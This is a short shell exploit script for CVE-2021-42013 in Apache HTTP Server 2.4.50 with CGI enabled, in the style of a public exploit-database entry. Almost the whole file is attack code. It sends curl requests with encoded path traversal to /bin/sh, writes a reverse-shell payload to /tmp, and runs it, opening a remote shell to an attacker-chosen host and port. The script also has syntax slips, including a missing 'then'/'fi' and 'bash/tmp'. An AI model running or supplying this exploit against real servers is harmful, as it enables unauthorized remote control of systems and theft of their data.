# Exploit: Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (2)
# Credits: Ash Daulton & cPanel Security Team
# Date: 24/07/2021
# Exploit Author: TheLastVvV.com
# Vendor Homepage:https://apache.org/
# Version: Apache 2.4.50 with CGI enable
# Tested on : Debian 5.10.28
# CVE : CVE-2021-42013
echo 'PoC CVE-2021-42013 reverse shell Apache 2.4.50 with CGI'
if [ $# -eq 0 ]
echo"try: ./$0 http://ip:port LHOST LPORT"
exit 1
curl "$1/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh" -d "echo Content-Type: text/plain; echo; echo '/bin/sh -i >& /dev/tcp/$2/$3 0>&1' > /tmp/revoshell.sh" && curl "$1/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh" -d "echo Content-Type: text/plain; echo; bash/tmp/revoshell.sh"
#usage chmod -x CVE-2021-42013.sh
#./CVE-2021-42013_reverseshell.sh http://ip:port/ LHOST LPORT